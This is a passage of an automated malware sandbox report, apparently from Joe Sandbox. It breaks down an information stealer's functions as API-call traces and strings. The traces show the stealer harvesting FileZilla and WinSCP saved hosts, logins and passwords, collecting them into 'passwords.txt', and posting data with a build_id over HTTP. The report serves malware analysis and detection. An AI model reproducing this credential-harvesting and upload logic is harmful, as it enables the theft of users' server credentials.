2a05e45-2a05e46 ExitProcess 321->324 325 2a05e4c-2a05e52 InternetCloseHandle 321->325 322->321 326 2a05ddc-2a05e0c call 2a10609 call 2a1058d call 2a02920 322->326 325->119 326->319
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 02A104E7: lstrcpy.KERNEL32(00000000,00000000), ref: 02A1050D
                                                                                                                                                                                • Part of subcall function 02A10519: lstrcpy.KERNEL32(00000000,?), ref: 02A10538
                                                                                                                                                                                • Part of subcall function 02A04AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 02A04AE8
                                                                                                                                                                                • Part of subcall function 02A04AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 02A04AEE
                                                                                                                                                                                • Part of subcall function 02A04AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 02A04AF4
                                                                                                                                                                                • Part of subcall function 02A04AB6: lstrlen.KERNEL32(000000FF,00000000,?), ref: 02A04B06
                                                                                                                                                                                • Part of subcall function 02A04AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 02A04B0E
                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 02A05519
                                                                                                                                                                                • Part of subcall function 02A11E5D: CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,00000000,02C5E908,?,?,?,02A128A1,?,?,00000000), ref: 02A11E7D
                                                                                                                                                                                • Part of subcall function 02A11E5D: GetProcessHeap.KERNEL32(00000000,?,?,?,?,02A128A1,?,?,00000000), ref: 02A11E8A
                                                                                                                                                                                • Part of subcall function 02A11E5D: RtlAllocateHeap.NTDLL(00000000), ref: 02A11E91
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,02A36986,02A3697B,02A3697A,02A3696F), ref: 02A05588
                                                                                                                                                                              • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 02A055AA
                                                                                                                                                                              • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 02A056C0
                                                                                                                                                                              • HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 02A05704
                                                                                                                                                                              • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 02A05736
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcpy.KERNEL32(00000000,?), ref: 02A105F5
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcat.KERNEL32(?,?), ref: 02A105FF
                                                                                                                                                                                • Part of subcall function 02A1058D: lstrcpy.KERNEL32(00000000,?), ref: 02A105BD
                                                                                                                                                                                • Part of subcall function 02A10609: lstrlen.KERNEL32(?,00000000,?,?,?,?,02A1709C,02A36C18,00000000,02A366CD,?,?,?,?,02A1858F), ref: 02A1061D
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcpy.KERNEL32(00000000,?), ref: 02A10645
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcat.KERNEL32(?,00000000), ref: 02A10650
                                                                                                                                                                              • lstrlen.KERNEL32(?,",file_data,02A37850,------,02A37844,?,",02A37838,------,02A3782C,b74ef0d8ce56e494b0d83e1d5be9dbeb,",build_id,02A37814,------), ref: 02A05C67
                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 02A05C7A
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02A05C92
                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 02A05C99
                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 02A05CA6
                                                                                                                                                                              • _memmove.LIBCMT ref: 02A05CB4
                                                                                                                                                                              • lstrlen.KERNEL32(?,?,?), ref: 02A05CC9
                                                                                                                                                                              • _memmove.LIBCMT ref: 02A05CD6
                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 02A05CE4
                                                                                                                                                                              • lstrlen.KERNEL32(?,?,00000000), ref: 02A05CF2
                                                                                                                                                                              • _memmove.LIBCMT ref: 02A05D05
                                                                                                                                                                              • lstrlen.KERNEL32(?,?,00000000), ref: 02A05D1A
                                                                                                                                                                              • HttpSendRequestA.WININET(?,?,00000000), ref: 02A05D2D
                                                                                                                                                                              • HttpQueryInfoA.WININET(?,00000013,?,?,00000000), ref: 02A05D6F
                                                                                                                                                                              • InternetReadFile.WININET(?,?,000007CF,?), ref: 02A05E26
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,block), ref: 02A05E3B
                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 02A05E46
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: lstrlen$Internetlstrcpy$Heap$HttpProcess_memmove$AllocateOpenRequestlstrcat$BinaryConnectCrackCryptExitFileInfoOptionQueryReadSendString
                                                                                                                                                                              • String ID: ------$"$"$"$"$--$------$------$------$------$ERROR$ERROR$b74ef0d8ce56e494b0d83e1d5be9dbeb$block$build_id$file_data
                                                                                                                                                                              • API String ID: 4232923880-4073018579
                                                                                                                                                                              • Opcode ID: 1e8c3e2fabfbba7688b3605c4fa3cc74ea1f6ebedc883ce54113c2e3df0dd7eb
                                                                                                                                                                              • Instruction ID: 8507352667d17b9604f469e467349327bb148169f84bf06dae119b890abca102
                                                                                                                                                                              • Opcode Fuzzy Hash: 1e8c3e2fabfbba7688b3605c4fa3cc74ea1f6ebedc883ce54113c2e3df0dd7eb
                                                                                                                                                                              • Instruction Fuzzy Hash: F742B071D802699ADF21EB20DD84B9DB3BABF04350F4185E1A949B3151DE70AFCA9F90
                                                                                                                                                                              Function 02A0E6CF Relevance: 70.3, APIs: 30, Strings: 10, Instructions: 289stringmemoryCOMMON
                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 02A104E7: lstrcpy.KERNEL32(00000000,00000000), ref: 02A1050D
                                                                                                                                                                                • Part of subcall function 02A11DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 02A11DFD
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcpy.KERNEL32(00000000,?), ref: 02A105F5
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcat.KERNEL32(?,?), ref: 02A105FF
                                                                                                                                                                                • Part of subcall function 02A1058D: lstrcpy.KERNEL32(00000000,?), ref: 02A105BD
                                                                                                                                                                                • Part of subcall function 02A10609: lstrlen.KERNEL32(?,00000000,?,?,?,?,02A1709C,02A36C18,00000000,02A366CD,?,?,?,?,02A1858F), ref: 02A1061D
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcpy.KERNEL32(00000000,?), ref: 02A10645
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcat.KERNEL32(?,00000000), ref: 02A10650
                                                                                                                                                                                • Part of subcall function 02A10519: lstrcpy.KERNEL32(00000000,?), ref: 02A10538
                                                                                                                                                                                • Part of subcall function 02A07FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,02A0E756,?,?,?), ref: 02A07FC7
                                                                                                                                                                                • Part of subcall function 02A07FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,02A0E756,?,?,?), ref: 02A07FDE
                                                                                                                                                                                • Part of subcall function 02A07FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,02A0E756,?,?,?), ref: 02A07FF5
                                                                                                                                                                                • Part of subcall function 02A07FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,02A0E756,?,?,?), ref: 02A0800C
                                                                                                                                                                                • Part of subcall function 02A07FAC: CloseHandle.KERNEL32(?,?,?,?,?,02A0E756,?,?,?), ref: 02A08034
                                                                                                                                                                                • Part of subcall function 02A11E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,02A16931,?), ref: 02A11E37
                                                                                                                                                                              • strtok_s.MSVCRT ref: 02A0E77E
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,000F423F,02A36912,02A3690F,02A3690E,02A3690D), ref: 02A0E7C4
                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 02A0E7CB
                                                                                                                                                                              • StrStrA.SHLWAPI(00000000,<Host>), ref: 02A0E7DF
                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 02A0E7EA
                                                                                                                                                                              • StrStrA.SHLWAPI(00000000,<Port>), ref: 02A0E81E
                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 02A0E829
                                                                                                                                                                              • StrStrA.SHLWAPI(00000000,<User>), ref: 02A0E857
                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 02A0E862
                                                                                                                                                                              • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 02A0E890
                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 02A0E89B
                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 02A0E901
                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 02A0E915
                                                                                                                                                                              • lstrlen.KERNEL32(02A0ECBC), ref: 02A0EA3D
                                                                                                                                                                                • Part of subcall function 02A16E97: CreateThread.KERNEL32(00000000,00000000,02A16DC6,?,00000000,00000000), ref: 02A16F36
                                                                                                                                                                                • Part of subcall function 02A16E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 02A16F3E
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: lstrlen$lstrcpy$File$AllocCreateHeapLocallstrcat$AllocateCloseFolderHandleObjectPathProcessReadSingleSizeThreadWaitstrtok_s
                                                                                                                                                                              • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$Host: $Login: $Password: $Soft: FileZilla$\AppData\Roaming\FileZilla\recentservers.xml$passwords.txt
                                                                                                                                                                              • API String ID: 1004949264-935134978
                                                                                                                                                                              • Opcode ID: 241f11946f0e68eddc8e45151e3958edd1ac43d449d3182845e97125f0b7a5d4
                                                                                                                                                                              • Instruction ID: c24cc2248e4dad84190fdab544be2f5ff51122996e4fd9fb386848bff3503fc4
                                                                                                                                                                              • Opcode Fuzzy Hash: 241f11946f0e68eddc8e45151e3958edd1ac43d449d3182845e97125f0b7a5d4
                                                                                                                                                                              • Instruction Fuzzy Hash: 95A1EE72D80229ABDF01BBE0EE89A9DBB79BF08751F504850F901B7050DF70AA598F95
                                                                                                                                                                              Function 02A0E186 Relevance: 56.3, APIs: 18, Strings: 14, Instructions: 325registryCOMMON
                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 451 2a0e186-2a0e231 call 2a23c10 * 4 RegOpenKeyExA 460 2a0e237-2a0e262 RegGetValueA 451->460 461 2a0e6b8-2a0e6ce call 2a01cde call 2a1d016 451->461 463 2a0e264-2a0e26a 460->463 464 2a0e287-2a0e28d 460->464 463->461 466 2a0e270-2a0e282 RegCloseKey 463->466 464->463 467 2a0e28f-2a0e295 464->467 466->461 469 2a0e297-2a0e2a3 RegCloseKey 467->469 470 2a0e2a9-2a0e2c1 RegOpenKeyExA 467->470 469->470 470->461 472 2a0e2c7-2a0e2e8 RegEnumKeyExA 470->472 472->463 473 2a0e2ee-2a0e2f9 call 2a104e7 472->473 475 2a0e2fe-2a0e3dd call 2a10609 call 2a1058d call 2a02920 call 2a10609 call 2a1058d call 2a02920 RegGetValueA call 2a10609 call 2a1058d call 2a02920 RegGetValueA 473->475 494 2a0e42d-2a0e454 call 2a10609 call 2a1058d call 2a02920 475->494 495 2a0e3df-2a0e42b call 2a12406 call 2a105c7 call 2a1058d call 2a02920 * 2 475->495 506 2a0e459-2a0e569 call 2a10609 call 2a1058d call 2a02920 RegGetValueA call 2a10609 call 2a1058d call 2a02920 call 2a10609 call 2a1058d call 2a02920 RegGetValueA call 2a10609 call 2a1058d call 2a02920 StrCmpCA 494->506 495->506 536 2a0e5d1-2a0e636 call 2a10609 call 2a1058d call 2a02920 RegEnumKeyExA 506->536 537 2a0e56b-2a0e590 call 2a0dca0 506->537 536->475 551 2a0e63c-2a0e698 call 2a01cfd lstrlen call 2a104e7 call 2a16e97 call 2a02920 536->551 542 2a0e592 537->542 543 2a0e594-2a0e5cb call 2a10609 call 2a1058d call 2a02920 call 2a0f030 537->543 542->543 543->536 565 2a0e69a-2a0e6a6 RegCloseKey 551->565 566 2a0e6ad-2a0e6b3 call 2a02920 551->566 565->566 566->461
                                                                                                                                                                              APIs
                                                                                                                                                                              • _memset.LIBCMT ref: 02A0E1B7
                                                                                                                                                                              • _memset.LIBCMT ref: 02A0E1D7
                                                                                                                                                                              • _memset.LIBCMT ref: 02A0E1E8
                                                                                                                                                                              • _memset.LIBCMT ref: 02A0E1F9
                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02A0E22D
                                                                                                                                                                              • RegGetValueA.ADVAPI32(?,Security,UseMasterPassword,00000010,00000000,?,?), ref: 02A0E25E
                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02A0E276
                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02A0E29D
                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Sessions,00000000,00000009,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02A0E2BD
                                                                                                                                                                              • RegEnumKeyExA.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000), ref: 02A0E2E0
                                                                                                                                                                              • RegGetValueA.ADVAPI32(?,?,HostName,00000002,00000000,?,?,Host: ,Soft: WinSCP,02A368E7), ref: 02A0E379
                                                                                                                                                                              • RegGetValueA.ADVAPI32(?,?,PortNumber,0000FFFF,00000000,?,?,?), ref: 02A0E3D9
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _memset$Value$CloseOpen$Enum
                                                                                                                                                                              • String ID: Login: $:22$Host: $HostName$Password$Password: $PortNumber$Security$Soft: WinSCP$Software\Martin Prikryl\WinSCP 2\Configuration$Software\Martin Prikryl\WinSCP 2\Sessions$UseMasterPassword$UserName$passwords.txt
                                                                                                                                                                              • API String ID: 463713726-2798830873
                                                                                                                                                                              • Opcode ID: 869858f60411e4aa3c75ad4f31966f9e0cd8522a28d2040971666241fd6b0a19
                                                                                                                                                                              • Instruction ID: 917236d0f35bc45e44834ef0dbbebbd2901c23a0f3f1ef29632c8aab007f666b
                                                                                                                                                                              • Opcode Fuzzy Hash: 869858f60411e4aa3c75ad4f31966f9e0cd8522a28d2040971666241fd6b0a19
                                                                                                                                                                              • Instruction Fuzzy Hash: A0D1D47295012DAAEB21EB94DD81BD9B779AF04314F4048E7A909B2050DB70BFC9DFA1
                                                                                                                                                                              Function 02A05F39 Relevance: 53.0, APIs: 20, Strings: 10, Instructions: 466networkstringmemoryCOMMON
                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 568 2a05f39-2a05ffe call 2a10519 call 2a04ab6 call 2a104e7 * 5 InternetOpenA StrCmpCA 583 2a06000 568->583 584 2a06006-2a0600c 568->584 583->584 585 2a06012-2a0619c call 2a11c4a call 2a105c7 call 2a1058d call 2a02920 * 2 call 2a10609 call 2a1058d call 2a02920 call 2a10609 call 2a1058d call 2a02920 call 2a105c7 call 2a1058d call 2a02920 call 2a10609 call 2a1058d call 2a02920 call 2a10609 call 2a1058d call 2a02920 call 2a10609 call 2a105c7 call 2a1058d call 2a02920 * 2 InternetConnectA 584->585 586 2a066ff-2a06727 InternetCloseHandle call 2a08048 584->586 585->586 662 2a061a2-2a061dc HttpOpenRequestA 585->662 591 2a06766-2a067ec call 2a02920 * 4 call 2a01cde call 2a02920 call 2a1d016 586->591 592 2a06729-2a06761 call 2a10549 call 2a10609 call 2a1058d call 2a02920 586->592 592->591 663 2a061e2-2a061e8 662->663 664 2a066f3-2a066f9 InternetCloseHandle 662->664 665 2a06206-2a06690 call 2a10609 call 2a1058d call 2a02920 call 2a105c7 call 2a1058d call 2a02920 call 2a10609 call 2a1058d call 2a02920 call 2a10609 call 2a1058d call 2a02920 call 2a10609 call 2a1058d call 2a02920 call 2a10609 call 2a1058d call 2a02920 call 2a105c7 call 2a1058d call 2a02920 call 2a10609 call 2a1058d call 2a02920 call 2a10609 call 2a1058d call 2a02920 call 2a105c7 call 2a1058d call 2a02920 call 2a10609 call 2a1058d call 2a02920 call 2a10609 call 2a1058d call 2a02920 call 2a10609 call 2a1058d call 2a02920 call 2a10609 call 2a1058d call 2a02920 call 2a10609 call 2a1058d call 2a02920 call 2a10609 call 2a1058d call 2a02920 call 2a10609 call 2a1058d call 2a02920 call 2a105c7 call 2a1058d call 2a02920 call 2a10609 call 2a1058d call 2a02920 call 2a10609 call 2a1058d call 2a02920 call 2a10609 call 2a1058d call 2a02920 call 2a10609 call 2a1058d call 2a02920 call 2a105c7 call 2a1058d call 2a02920 lstrlen * 2 GetProcessHeap RtlAllocateHeap lstrlen call 2a27050 lstrlen * 2 call 2a27050 lstrlen HttpSendRequestA 663->665 666 2a061ea-2a06200 InternetSetOptionA 663->666 664->586 809 2a066d2-2a066ea InternetReadFile 665->809 666->665 810 2a06692-2a0669a 809->810 811 2a066ec-2a066ed InternetCloseHandle 809->811 810->811 812 2a0669c-2a066cd call 2a10609 call 2a1058d call 2a02920 810->812 811->664 812->809
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 02A10519: lstrcpy.KERNEL32(00000000,?), ref: 02A10538
                                                                                                                                                                                • Part of subcall function 02A04AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 02A04AE8
                                                                                                                                                                                • Part of subcall function 02A04AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 02A04AEE
                                                                                                                                                                                • Part of subcall function 02A04AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 02A04AF4
                                                                                                                                                                                • Part of subcall function 02A04AB6: lstrlen.KERNEL32(000000FF,00000000,?), ref: 02A04B06
                                                                                                                                                                                • Part of subcall function 02A04AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 02A04B0E
                                                                                                                                                                                • Part of subcall function 02A104E7: lstrcpy.KERNEL32(00000000,00000000), ref: 02A1050D
                                                                                                                                                                              • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 02A05FD8
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?), ref: 02A05FF6
                                                                                                                                                                              • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 02A0618E
                                                                                                                                                                              • HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 02A061D2
                                                                                                                                                                              • lstrlen.KERNEL32(?,",mode,02A378D8,------,02A378CC,b74ef0d8ce56e494b0d83e1d5be9dbeb,",build_id,02A378B4,------,02A378A8,",02A3789C,------), ref: 02A065FD
                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 02A0660C
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02A06617
                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 02A0661E
                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 02A0662B
                                                                                                                                                                              • _memmove.LIBCMT ref: 02A06639
                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 02A06647
                                                                                                                                                                              • lstrlen.KERNEL32(?,?,00000000), ref: 02A06655
                                                                                                                                                                              • _memmove.LIBCMT ref: 02A06662
                                                                                                                                                                              • lstrlen.KERNEL32(?,?,00000000), ref: 02A06677
                                                                                                                                                                              • HttpSendRequestA.WININET(00000000,?,00000000), ref: 02A06685
                                                                                                                                                                              • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 02A066E2
                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 02A066ED
                                                                                                                                                                              • InternetCloseHandle.WININET(?), ref: 02A066F9
                                                                                                                                                                              • InternetCloseHandle.WININET(?), ref: 02A06705
                                                                                                                                                                              • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 02A06200
                                                                                                                                                                                • Part of subcall function 02A10609: lstrlen.KERNEL32(?,00000000,?,?,?,?,02A1709C,02A36C18,00000000,02A366CD,?,?,?,?,02A1858F), ref: 02A1061D
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcpy.KERNEL32(00000000,?), ref: 02A10645
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcat.KERNEL32(?,00000000), ref: 02A10650
                                                                                                                                                                                • Part of subcall function 02A1058D: lstrcpy.KERNEL32(00000000,?), ref: 02A105BD
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcpy.KERNEL32(00000000,?), ref: 02A105F5
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcat.KERNEL32(?,?), ref: 02A105FF
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Internetlstrlen$lstrcpy$CloseHandle$HeapHttpOpenRequest_memmovelstrcat$AllocateConnectCrackFileOptionProcessReadSend
                                                                                                                                                                              • String ID: "$"$"$------$------$------$------$b74ef0d8ce56e494b0d83e1d5be9dbeb$build_id$mode
                                                                                                                                                                              • API String ID: 3306106941-443600106
                                                                                                                                                                              • Opcode ID: a13aef782eae1466db8740d6364cf700b0e51f380b9bee78111d0be8795f8cd1
                                                                                                                                                                              • Instruction ID: d38feb94fc1820e86f26fad5c6967b016ca5af736833ff8b87385b2cfe50267b
                                                                                                                                                                              • Opcode Fuzzy Hash: a13aef782eae1466db8740d6364cf700b0e51f380b9bee78111d0be8795f8cd1
                                                                                                                                                                              • Instruction Fuzzy Hash: 3F228531D802799ADF21EB60DE45BDDB776AF04310F4185E2A919B3150DE70AFDA8FA0
                                                                                                                                                                              Function 02A18643 Relevance: 48.2, APIs: 32, Instructions: 154libraryloaderCOMMON
                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                              Control-flow Graph

